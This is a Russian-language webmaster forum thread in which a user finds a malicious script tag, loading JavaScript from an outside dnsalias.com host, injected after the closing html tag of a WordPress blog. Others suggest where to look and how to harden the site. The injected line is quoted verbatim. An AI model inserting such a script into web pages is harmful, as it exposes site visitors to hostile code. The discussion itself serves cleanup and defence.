С нами с 11.10.05
Сообщения: 773
Рейтинг: 501
|
 Добавлено: 21/01/13 в 18:41 |
На блоге появился подключаемый скрипт с вирусней (может не вирусня, конечно, но это не мое  ), причем вставлен он после </html>
</html><script src="http://eetitqf.dnsalias.com/js/rsize.js"></script>
Где найти как он вставляется? В футере все чисто.
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 18:50 |
ищи по изменениям, лично я знаю 10 вариантов, из них 6 хитровыебаных.
Ну а так для начала, index.php в корне и functions.php проверь. также глянь htaccess там можно добавлять тоже, мало кто знает но встречал.
|
|
|
|
| |
С нами с 11.10.12
Сообщения: 428
Рейтинг: 1032
|
| Добавлено: 21/01/13 в 19:24 |
| Код: | | php -i | grep auto_append_file |
|
|
|
|
apache, bash, css, elasticsearch, ffmpeg, html, js, mysql, mongo, nginx, php; *nix only
|
5
|
|
| |
С нами с 11.10.05
Сообщения: 773
Рейтинг: 501
|
| Добавлено: 21/01/13 в 19:41 |
Действительно в index.php в корне было, че-то не посмотрел туда
|
|
|
|
| |
С нами с 09.11.12
Сообщения: 60
Рейтинг: 63
|
| Добавлено: 21/01/13 в 19:56 |
Нужно смотреть что в логах. И разматывать цепочку латать уязвимость и чистится.
|
|
|
|
| |
С нами с 11.10.05
Сообщения: 773
Рейтинг: 501
|
| Добавлено: 21/01/13 в 19:58 |
Уметь бы еще это делать
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 20:41 |
mazzzer2:  дай фтп доступ, деловто 10 минут.
|
|
|
|
| |
С нами с 11.10.05
Сообщения: 773
Рейтинг: 501
|
| Добавлено: 21/01/13 в 20:47 |
так нашел уже
остальные файлы без изменений
по фтп нельзя же логи посмотреть
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 20:54 |
mazzzer2: удалить то удалил а как залил то не знаешь ведь.
|
|
|
|
| |
Z
С нами с 15.05.05
Сообщения: 55052
Рейтинг: 7770
|
| Добавлено: 21/01/13 в 22:16 |
Дартаньян: а можно поинтересоватся, как ты с FTP доступом узнаешь как его залили ?
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 22:28 |
andreich: опять, ты гвардеец, какое тебе дело до этого? Интересно? Так по гугли!
|
|
|
|
| |
Z
С нами с 15.05.05
Сообщения: 55052
Рейтинг: 7770
|
| Добавлено: 21/01/13 в 22:39 |
да хули мне гуглить, если нормально настроен сервак, ты даже логов по FTP не сможешь посмотреть
я тебе что Грубил ? помойму ты какойто дальний родственик suomi
mazzzer2: если блог на WP обнови до последней версии, тут я бы вообще предложил радикальные меры, убивание всех файлов кроме папки /wp-content/ ну и конечно фала wp-config.php
ну полежит блог 5 минут ничего страшного
проверь права CHMOD на папки
посмотри что в папке /wp-content/uploads/ (в основном овно как раз туда попадает, так как папка в большинстве случаев имеет CHMOD 777
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 22:51 |
andreich: просто ты утомил меня  , на хрен мне логи? я файлики посмотрю, уверяю у меня опыт латания и администрирования этого больше чем у тебя опыта в АВМ, особенно помню про require для удаленных файлов. кстати ты когда включил allow_url_include, сапка то наверное и заработала, только для WP твой гениальный подход это смерть.
mazzzer2: также смени пасс к ftp и админки, проверь если еще один админ или редактор какой левый, есть также плагин и плагин.
|
|
|
|
| |
Z
С нами с 15.05.05
Сообщения: 55052
Рейтинг: 7770
|
| Добавлено: 21/01/13 в 23:08 |
| Дартаньян писал: | | andreich: просто ты утомил меня |
ну может быть, но как мне кажется, это ты уже утомил всех на форуме
своми мега весерами мозга
P.S. allow_url_include было там не причем
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 23:13 |
| andreich писал: | | мега весерами |
покинь топик ты все равно в этом не шаришь.
|
|
|
|
| |
+ + + + + +
С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809
|
| Добавлено: 21/01/13 в 23:22 |
А как вы поняли что у тс вордпрес то
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 21/01/13 в 23:48 |
awm5433224455: 95% что вордпресс, ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.
|
|
|
|
| |
+ + + + + +
С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809
|
| Добавлено: 22/01/13 в 00:18 |
| Дартаньян писал: | | ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя. |
 да и вордпресс я из за этого не долюбливаю потому что в нем постоянно косяки и над ним нужно корпеть постоянно. А когда разрастается это все до нескольких сайтов тут совсем веселье начинается.
Даже гонки успел обновиться или червь пробежался по всем и проставил фрейма
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 22/01/13 в 00:30 |
awm5433224455: накатаю мануал, по безопасности для WP.
|
|
|
|
| |
С нами с 22.05.09
Сообщения: 639
Рейтинг: 1087
|
| Добавлено: 22/01/13 в 00:57 |
Ты сначала накатай то, что обещал 
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 22/01/13 в 01:12 |
st01en: пишу, учел пожелания доброжелателей к краткому мануалу.
|
|
|
|
| |
+ + + + + +
С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809
|
| Добавлено: 22/01/13 в 12:20 |
| Дартаньян писал: | | awm5433224455: trollface.png накатаю мануал, по безопасности для WP. |
Тут нужно осторожно писать, по безопастности лучше не писать. Научишь переломают пол интернета за ночь
|
|
|
|
| |
Z
С нами с 15.05.05
Сообщения: 55052
Рейтинг: 7770
|
| Добавлено: 22/01/13 в 12:29 |
awm5433224455: че он там может написать ? там все сводится к двум вещям - CHMOD правильные и правильно настроенный сервак, вот и все
|
|
|
|
| |
+ + + + + +
С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809
|
| Добавлено: 22/01/13 в 13:10 |
скрипт кидисы всеравно сумеют нагадить своими дефейсами вида луиз сек
|
|
|
|
| |
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
| Добавлено: 22/01/13 в 13:35 |
| andreich писал: | | правильно настроенный сервак |
вот ты и ответил о чем я напишу.
|
|
|
|
| |
